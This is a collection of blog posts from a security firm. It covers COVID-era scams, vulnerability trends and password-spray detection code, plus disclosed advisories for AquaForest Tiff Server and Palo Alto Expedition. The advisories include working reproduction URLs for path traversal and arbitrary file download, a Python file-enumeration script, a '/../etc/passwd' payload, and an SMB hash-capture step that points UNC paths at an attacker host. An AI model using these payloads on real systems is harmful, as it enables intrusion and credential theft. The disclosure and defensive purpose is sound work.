Challenging times bring out the best in people, but also the worst. As the world deals with COVID-19 and the economic fallout, you can be sure that scammers are looking for ways to capitalize on this crisis. Among their methods is leveraging current events and news.

“Every year we see tax refund season create a spike in scams targeting people in an effort to steal their money. The same will likely hold true now as we expect to see an uptick in scammers taking advantage of the current COVID-19 pandemic with phishing (Email), vishing (Voice), or smishing (SMS) attacks,” said Quentin Rhoads-Herrera, director of professional services and TEAMARES at CyberOne. “We’re anticipating a spike in online financial scams as the federal government works to stimulate the economy. Ideas such as sending checks to Americans ‘immediately’ to help cushion the economic impact of the coronavirus outbreak will surely open the door for online financial scams.”

Being proactive is key in safeguarding your business, as well as keeping the following in mind:

  • Be on high alert. Scams come in all flavors. The safest bet is to always direct questions, comments, or concerns directly to the source, be it the IRS, your bank, vendors, partners, customers – anyone.
  • Always question offers of unsolicited financial assistance. Go directly to trusted sources instead of blindly trusting emails, phone calls, or even text messages.
  • Be proactive – prepare for breaches by ensuring you have a game plan in place. Whether it’s taking advantage of incident retainer services or dusting off your business continuity plan, work to stay ahead of cybercriminals.

Follow us at @TeamAresSec to stay up to date as the situation evolves.

CyberOne’s TEAMARES Research Is Aiding Global Fight Against COVID-19

What does a computer virus have in common with the Coronavirus (COVID-19)? Plenty, believe it or not, as technology can be used to help solve both.

The TEAMARES research team has found that our hash cracker Cthulhu can be used to run computer simulations that mimic the same complex protein folding that occurs in viruses. We’re sharing our findings with Folding@Home to simulate how the virus behaves – data that we hope can be used by doctors and healthcare professionals to develop potential vaccines.

Folding@Home is a project established to assist researchers around the world to take up the fight against COVID-19. It leverages complex algorithms to simulate protein folding in order to examine diseases such as COVID-19. This project allows people with laptops or even complex GPU machines to provide computing power to help provide those protein folding simulations.

Similar to cryptocurrency mining, people who are not medical experts are able to leverage their own expertise to help solve global issues such as COVID-19. With the help of Cthulhu, TEAMARES has been processing jobs straight from Folding@Home on our CPU and GPU processing power. Folding@Home then takes that data to help in researching viruses.

We’re hoping our participation in this project will help medical professionals across the globe find a cure. For more information, visit foldingathome.org, and be sure to follow us on Twitter @TeamAresSec to stay up to date as the situation unfolds.

Vulnerabilities Discovered in Tiff Server from AquaForest

Versions Tested:

Tiff Server 4.0


Product:

https://www.aquaforest.com/en/tiffserver.asp


Security Advisories:

N/A


CVE Numbers:

CVE-2020-9323

CVE-2020-9324

CVE-2020-9325


CVSS Score:

  • Unauthenticated File and Directory Enumeration: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:P/RL:W/RC:C
  • Unauthenticated Arbitrary File Download: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:W/RC:C
  • Unauthenticated SMB Hash Capture via UNC: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:W/RC:C


CWE:

  • Unauthenticated File and Directory Enumeration: CWE-22: Improper Limitation of a Pathname to a Restricted Directory (“Path Traversal”)
  • Unauthenticated Arbitrary File Download: CWE-20: Improper Input Validation
  • Unauthenticated SMB Hash Capture via UNC: CWE-522: Insufficiently Protected Credentials


NIST:

  • Unauthenticated File and Directory Enumeration: AC-3: Access Enforcement
  • Unauthenticated Arbitrary File Download: SI-10: Information Input Validation
  • Unauthenticated SMB Hash Capture via UNC: SC-28: Protection of Information at Rest


OWASP:

  • Unauthenticated File and Directory Enumeration: A5 Broken Access Control
  • Unauthenticated Arbitrary File Download: A1: Injection
  • Unauthenticated SMB Hash Capture via UNC: A3: Sensitive Data Exposure

Summary:

The product Tiff Server 4.0 from AquaForest is vulnerable to the following:

  • Unauthenticated File and Directory Enumeration
  • Unauthenticated Arbitrary File Download
  • Unauthenticated SMB Hash Capture via UNC

Of the three vulnerabilities discovered in the Tiff Server product, only the arbitrary file download issue has been confirmed as fixed. The vendor stated that the SMB hash capture and the file and directory enumeration issues are not planned to receive a patch. As of October 10th, 2019, the vendor's stance on these issues was:

“Tiff Server is not intended for use on a public website (we advise against using it in this way) & also clients should be able to apply their own security if they have concerns”

TEAMARES advises users of the product to update, and to block outbound SMB from the server to any host other than those this application needs to reach. The application should also be placed behind a WAF, or not exposed externally at all, where possible.

Vulnerability – Unauthenticated File and Directory Enumeration:

The TIFF Server framework from https://www.aquaforest.com/en/tiffserver.asp allows users to make unauthenticated GET requests such as: https://www.<host>/tiffserver/tssp.aspx?FN=C:\Windows\win.ini&PC=Y.

The response reveals whether a file exists, whether a directory exists, and how many files a directory contains. This is limited information, but it should not be obtainable without authentication.


To reproduce:

In order to replicate the vulnerability, all a user has to do is make a GET request to: https://www.<host>/tiffserver/tssp.aspx?FN=. File paths are passed in the URL as the variable “FN”.

First, a nonexistent file is passed in the “FN” variable and the response reads “afPageCount=0”.

Next, a real file is passed and the message returned is drastically different.

Finally, a directory is passed and the number of files it contains is shown in the response.
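The three observations above turn tssp.aspx into a blind existence oracle, which is what makes "limited information" still worth fixing. The following is an added example, not code from the advisory or from AquaForest: it assumes only what the write-up states (an unauthenticated GET to /tiffserver/tssp.aspx?FN=<path>&PC=Y answers "afPageCount=0" for a path that does not exist and something else for a real file or directory). The wordlist and the stand-in server reply for an existing path are assumptions, and the HTTP transport is injectable so the logic runs offline.

```python
"""Existence oracle built on the tssp.aspx behaviour described in the advisory.

Added example (not the advisory's or AquaForest's code). The only behaviour relied
on is the documented "afPageCount=0" reply for a missing path; everything else is
an assumption marked as such.
"""
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

TSSP_PATH = "/tiffserver/tssp.aspx"
MISSING_MARKER = "afPageCount=0"  # body returned for a nonexistent path (from the write-up)

# Starter wordlist (assumed, not from the advisory): a known-good file to calibrate the
# oracle, IIS paths an attacker would care about, and a control path that should not exist.
DEFAULT_PATHS = [
    r"C:\Windows\win.ini",
    r"C:\inetpub\wwwroot\web.config",
    r"C:\inetpub\wwwroot",
    r"C:\does\not\exist.txt",
]


def enum_url(base_url: str, path: str) -> str:
    """Build the probe URL; urlencode percent-encodes the colon and the backslashes."""
    query = urllib.parse.urlencode({"FN": path, "PC": "Y"})
    return f"{base_url.rstrip('/')}{TSSP_PATH}?{query}"


def classify(body: str) -> str:
    """'missing' when the server reports zero pages, otherwise 'exists'."""
    return "missing" if MISSING_MARKER in body else "exists"


def http_get(url: str, timeout: float = 10.0) -> str:
    """Real transport, for use only against a target you are authorised to test."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe(base_url: str, paths: Iterable[str],
          fetch: Callable[[str], str] = http_get) -> Dict[str, str]:
    """Return {path: 'exists' | 'missing'} for every path in the wordlist."""
    return {p: classify(fetch(enum_url(base_url, p))) for p in paths}


# Constructed stand-in for a Tiff Server host so the example runs offline. Only the
# "afPageCount=0" reply is documented; the reply for an existing path is made up.
_FAKE_FS = {r"C:\Windows\win.ini", r"C:\inetpub\wwwroot\web.config", r"C:\inetpub\wwwroot"}


def fake_fetch(url: str) -> str:
    params = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    requested = params.get("FN", [""])[0]
    return "afPageCount=1" if requested in _FAKE_FS else MISSING_MARKER


if __name__ == "__main__":
    for path, verdict in probe("https://www.example.test", DEFAULT_PATHS, fake_fetch).items():
        print(f"{verdict:<8} {path}")
```

Swap `fake_fetch` for the default `http_get` to run it against a real host; the same `enum_url` encoding is what you need for any path containing backslashes, since a raw `\` in a query string is what most extraction and copy-paste mangles.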

Vulnerability – Unauthenticated Arbitrary File Download:

The framework TIFF Server from https://www.aquaforest.com/en/tiffserver.asp suffers from an unauthenticated local file inclusion vulnerability that allows malicious users to download any file from the webserver.

The vulnerability can be triggered via the download.aspx file: https://www.<host>/tiffserver/download.aspx

This was found by downloading a 14-day trial of the software and analyzing the code. Since it is written in .NET, we can use a tool called dotPeek (https://www.jetbrains.com/decompiler/) to decompile the DLLs back to source. The code shown below neither checks authentication nor sanitizes the filename that is passed.


To Reproduce:

In order to replicate the vulnerability, a user simply navigates to the URL and supplies a file path in the filename parameter (“name” in the request below).

https://www.<host>/tiffserver/download.aspx?name=C:\Windows\win.ini

Vulnerability – Unauthenticated SMB Hash Capture via UNC:

The framework TIFF Server from https://www.aquaforest.com/en/tiffserver.asp allows a user to pass a UNC path in multiple variables of the application. The server then connects to that path over SMB, which allows malicious users to capture the Net-NTLMv2 hash of the Windows account the application runs as, without any authentication. This vulnerability was discovered by reading the documentation available for this software.

To Reproduce:

To replicate the vulnerability, a user only needs to set up a listener for the SMB traffic. In our case, we used Metasploit’s auxiliary SMB Capture module and modified our firewall to forward SMB traffic (TCP 445) to our attacking box.

Next, navigate to one of the two URLs below unauthenticated, substituting your listener’s IP for <attacker ip>.

  • https://www.<host>/tiffserver/tiffserverclassic.aspx?at_path=\\<attacker ip>\test
  • https://www.<host>/tiffserver/tiffpilot.exe?FN=\\<attacker ip>\test

That resulted in us receiving the Net-NTLMv2 hash for the app user, which is a critical issue since it is both unauthenticated and external.

Timeline:

09/12/2019 – Discovered Issue
09/12/2019 – First communication sent to vendor / No Response
09/30/2019 – Second communication sent to vendor / No Response
10/03/2019 – Third communication sent to vendor
10/03/2019 – Vendor responded
10/04/2019 – Reports sent to the vendor
10/09/2019 – Vendor confirmed Unauthenticated Arbitrary File Download to be fixed
10/10/2019 – Vendor confirmed Unauthenticated Arbitrary File Download fix will be released but stated they would not fix the other two issues
02/20/2020 – Obtained CVEs
02/26/2020 – Released publicly


Credit:

Discovered by Quentin (paragonsec) Rhoads-Herrera, Director of Professional Services for TEAMARES at CyberOne.


New course offered at BlackHat 2020:

To help sharpen the skills of penetration testers and threat hunting teams, TEAMARES will be offering an onsite training course at BlackHat USA 2020 in “Adversary Emulation and Active Defense.”  This course will provide information security concepts utilized in both offense and defense. Attendees will learn skills that can be applied to increase capability from both sides including exploitation, circumventing defenses and lateral movement from an attacker’s perspective. The course will also cover key techniques for detection, threat hunting and mitigation to counter an attacker’s toolbox.

Follow us on Twitter @TeamAresSec and @paragonsec to stay up to date

Vulnerability Focus: Exploits Impacting Organizations

No matter how much you think you’ve done to protect your data and systems, common vulnerabilities continue to wreak havoc on enterprises. Cyberattacks are already increasing due to global events, meaning it’s more important than ever to identify and secure vulnerabilities.

The following are some vulnerability trends the TEAMARES team is seeing – and what you can do to protect your organization.

Problems with Patch Management and Secure Coding Practices

Externally facing assets, which should be treated as among the highest-risk assets, tend to suffer from poor patch management and insecure coding. Custom applications are being developed without input sanitization, which leads to some of the more severe vulnerabilities, the ones that allow us to access systems and reach your internal network. From an external perspective, patch management and secure coding are the priorities, as most vulnerabilities stem from a lapse in one or the other.

Weak passwords

Weak passwords continue to be an issue. We often find that the fastest way to domain admin isn’t some novel zero-day exploit that leads to a critical finding; it’s literally guessing a password, logging in as that domain admin, and gaining a foothold and control over the entire infrastructure. Recent examples include four-character passwords belonging to domain admins, and eight-character passwords on service accounts that had not been changed in over five years, either of which can have severe consequences for a corporation.

The best way to tackle weak passwords is to rotate them, make them complex and leverage multifactor authentication. Make it difficult for the average script kiddie or novice hacker to gain access to or control of your network; enforcing password complexity gets you most of the way there. In addition, placing critical accounts such as domain admins in the Active Directory Protected Users group keeps their credentials from being cached in memory on the hosts they log on to, raising the skill needed to capture them.

Orphaned machines

Orphaned machines are causing organizations numerous headaches. These are machines that have fallen out of date and/or out of the asset management system but are still on the network, and they may contain sensitive passwords or source code. We often find that these machines are still vulnerable to EternalBlue or even older vulnerabilities. TEAMARES has exploited such machines and gained domain admin because a domain admin password was left behind as an artifact on the machine, which poses a severe risk for an enterprise.

We strongly encourage companies to scan their networks, not just for the machines in the asset inventory, but for any machine that could be living in that subnet or netblock.

Lack of security monitoring or detection

We’re also finding a lack of security monitoring and detection: companies aren’t installing or using their security tools appropriately, which makes those tools easy to bypass.

If you have defensive technologies in place, it’s imperative that your security team is trained to use them. Our team frequently finds tools in place that nobody is monitoring, so alerts go unreviewed. Employees need to be empowered to follow up on these alerts to stop attackers and cut dwell time.

When we conduct pen testing for clients, we want our reports to highlight the positives: what we were detected doing. However, we often find that we are not detected doing some of the most common and basic techniques known in the field, like using Responder to poison name-resolution requests or password spraying across whole subnets. Techniques like these should be caught quickly, alerted on, and followed up on by your defensive teams.
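Password spraying is one of the easiest of these techniques to detect, because it looks nothing like a user mistyping a password: many distinct accounts each fail once or twice from a single source in a short window. The following is an added example, not code from the article, showing that logic over Windows 4625 logon-failure events alongside a brute-force check (one account, many failures) and a check for a successful 4624 logon from a spraying source. The events are constructed, reduced to the fields a SIEM already parses, and the thresholds are assumptions to be tuned per environment.

```python
"""Password-spray and brute-force detection over Windows 4625 logon-failure events.

Added example; not code from the article. Sample events are constructed and the
thresholds (window, user counts) are assumptions for illustration.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

Event = Tuple[str, int, str, str]  # (ISO timestamp, EventID, TargetUserName, IpAddress)

# Constructed sample: 10.10.5.23 sprays six accounts once each in three minutes and then
# logs in as frank; 10.10.7.9 hammers one service account; 10.10.9.4 is a user who typoed twice.
SAMPLE_EVENTS: List[Event] = [
    ("2020-01-15T09:00:01", 4625, "alice", "10.10.5.23"),
    ("2020-01-15T09:00:31", 4625, "bob", "10.10.5.23"),
    ("2020-01-15T09:01:02", 4625, "carol", "10.10.5.23"),
    ("2020-01-15T09:01:33", 4625, "dave", "10.10.5.23"),
    ("2020-01-15T09:02:04", 4625, "erin", "10.10.5.23"),
    ("2020-01-15T09:02:35", 4625, "frank", "10.10.5.23"),
    ("2020-01-15T09:02:50", 4624, "frank", "10.10.5.23"),
    *[(f"2020-01-15T09:05:{s:02d}", 4625, "svc_backup", "10.10.7.9") for s in range(0, 40, 5)],
    ("2020-01-15T09:10:00", 4625, "grace", "10.10.9.4"),
    ("2020-01-15T09:10:20", 4625, "grace", "10.10.9.4"),
]


def _failures_by_source(events: List[Event]) -> Dict[str, List[Tuple[datetime, str]]]:
    """Group 4625 events by source IP, sorted by time, as (timestamp, user) pairs."""
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, event_id, user, ip in events:
        if event_id == 4625:
            by_src[ip].append((datetime.fromisoformat(ts), user))
    for fails in by_src.values():
        fails.sort()
    return by_src


def detect_spray(events: List[Event], window: timedelta = timedelta(minutes=10),
                 min_users: int = 5, max_per_user: int = 2):
    """One tuple (source_ip, distinct_users, window_start, window_end) per spraying source.

    A window qualifies when it holds >= min_users distinct accounts and no single account
    fails more than max_per_user times; the widest qualifying window per source is reported.
    """
    alerts = []
    for ip, fails in _failures_by_source(events).items():
        best, start = None, 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best[1]:
                    best = (ip, len(per_user), fails[start][0].isoformat(), fails[end][0].isoformat())
        if best is not None:
            alerts.append(best)
    return alerts


def detect_bruteforce(events: List[Event], window: timedelta = timedelta(minutes=10),
                      min_failures: int = 5):
    """One tuple (source_ip, user, peak_failures) per account hammered from one source."""
    alerts = []
    for ip, fails in _failures_by_source(events).items():
        per_user: Dict[str, List[datetime]] = defaultdict(list)
        for ts, user in fails:
            per_user[user].append(ts)
        for user, times in per_user.items():
            peak, start = 0, 0
            for end in range(len(times)):
                while times[end] - times[start] > window:
                    start += 1
                peak = max(peak, end - start + 1)
            if peak >= min_failures:
                alerts.append((ip, user, peak))
    return alerts


def successes_from_spray_sources(events: List[Event], spray_alerts) -> List[Tuple[str, str]]:
    """Accounts that logged on successfully (4624) from a source flagged as spraying."""
    sources = {alert[0] for alert in spray_alerts}
    return sorted({(ip, user) for _, event_id, user, ip in events if event_id == 4624 and ip in sources})


if __name__ == "__main__":
    sprays = detect_spray(SAMPLE_EVENTS)
    print("spray:", sprays)
    print("bruteforce:", detect_bruteforce(SAMPLE_EVENTS))
    print("likely compromised:", successes_from_spray_sources(SAMPLE_EVENTS, sprays))
```

The spray rule keys on distinct accounts rather than failure volume, which is why a per-account lockout threshold never fires on it; the third function is the one that turns a noisy alert into an incident, since a 4624 from a spraying source is the account the attacker now holds.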

Given how much of this is low-hanging fruit, our goal is to educate the market about these common issues. We can work together to patch, fix and close them, making it harder for attackers to hack your network, own your domain and impact your users and customers.

Check back each month for the latest vulnerabilities being seen by our team as a guide to help protect your systems.

by Quentin Rhoads-Herrera | Director of Professional Services, CyberOne

January 15, 2020

A Commitment to Getting It Right: Palo Alto Networks’ Expedition Migration Tool

Background:

During a recent penetration test for a client, I came across a tool called MigrationTool from Palo Alto Networks. The tool was littered with issues: unauthenticated disclosure of passwords, hashes, version information, and more.

So, what’s a TEAMARES team member to do? I quickly grabbed my screenshots and informed Palo Alto Networks of the chaos I uncovered. To my dismay, Palo Alto set me straight and told me they no longer support this product — they, instead, revamped it into a tool called Expedition. They did, however, give me some news that sparked some happiness; Palo Alto Networks’ PSIRT team encouraged me to look at Expedition for any similar issues! A company that wants their products actively tested? The game was on at that point!

Versions Tested:
1.0.106

CVE Numbers:
CVE-2018-10142

Security Advisories:
PAN-SA-2018-0016 – https://securityadvisories.paloaltonetworks.com/Home/Detail/135

Issue:

Luckily, Expedition is free and ships as a VM, which makes researching it straightforward. My goal was to find the same issues that existed in MigrationTool, but that goal was quickly squashed: it was very apparent that Palo Alto Networks had made some serious changes. A shout out to Palo Alto Networks’ commitment to quality.

After searching through the web code that could be reached without authentication, I came across a file named checkPidStatus.php.

Figure 1: checkPidStatus.php Code

After looking at the code, it appeared its main function was to check the existence of a running process by doing the following:

  • Ingest an HTTP GET request with the variable pid
  • Pass the variable pid to a function which checks whether the specific process is running and return the result true or false.

However, the code checked for the running process by calling file_exists on the path /proc/<pid>. Because the pid value was not sanitized, any unauthenticated user could supply a path traversal sequence and check the existence of any file on the file system.

Proof of Concept:

As an unauthenticated user, send an HTTP GET request to http://<IP>/API/process/checkPidStatus.php with the variable pid in the body of the request. Replace the pid value with a path traversal payload such as /../etc/passwd. If the file exists, the response contains isRunning: true.

Figure 2: A file that exists
Figure 3: A file that doesn’t exist
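The root cause is simple enough to model in a few lines. The following is an added example in Python, not Expedition’s PHP, that mirrors the behaviour described above: "/proc/" is concatenated with the user-supplied pid and handed to an existence check, so a traversal payload resolves to an arbitrary path on disk. The fixed variant validates the pid as a plain number before it touches the filesystem. The filesystem is a constructed stand-in so the example runs offline, and the function names, the stand-in paths and the digit bound are illustrative assumptions.

```python
"""Root cause of the checkPidStatus.php existence oracle, and the fix, modelled in Python.

Added example, not Expedition's code. The stand-in filesystem is constructed so the
example runs offline; names and bounds are illustrative.
"""
import posixpath
import re
from typing import Callable

PROC_ROOT = "/proc/"


def resolve_pid_path(pid: str) -> str:
    """What the vulnerable concatenation actually checks once '..' and '//' are resolved."""
    return posixpath.normpath(PROC_ROOT + pid)


def is_running_vulnerable(pid: str, exists: Callable[[str], bool]) -> bool:
    """Mirror of file_exists('/proc/' . $pid): any path on disk is reachable via '..'."""
    return exists(resolve_pid_path(pid))


# Fixed version: a PID is a short run of digits with no leading zero; reject everything
# else before the value gets anywhere near the filesystem. The 7-digit bound is an
# assumption that covers Linux pid_max; it is not from the advisory.
PID_RE = re.compile(r"[1-9][0-9]{0,6}")


def is_running_fixed(pid: str, exists: Callable[[str], bool]) -> bool:
    if PID_RE.fullmatch(pid) is None:
        return False
    return exists(PROC_ROOT + pid)


# Constructed stand-in filesystem: two live processes and one sensitive file.
_FAKE_FS = {"/proc/1", "/proc/4242", "/etc/passwd"}


def fake_exists(path: str) -> bool:
    return path in _FAKE_FS


if __name__ == "__main__":
    for payload in ("4242", "/../etc/passwd", "/../etc/shadow"):
        print(f"{payload!r:18} vulnerable={is_running_vulnerable(payload, fake_exists)} "
              f"fixed={is_running_fixed(payload, fake_exists)}")
```

Note that the fix is an allow-list on the value, not a blocklist of "../": stripping traversal sequences leaves encoded and doubled variants to argue about, whereas a value that must match `[1-9][0-9]{0,6}` cannot name anything outside /proc.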

Timeline:

2018-10-17 – Vendor Disclosure

2018-10-17 – Vendor Responded Confirming the Vulnerability

2018-11-20 – Vendor Informed Vulnerability Has Been Fixed and Issued CVE-2018-10142

2018-12-03 – Public Release

by Quentin (Paragonsec) Rhoads-Herrera | TEAMARES
November 29, 2018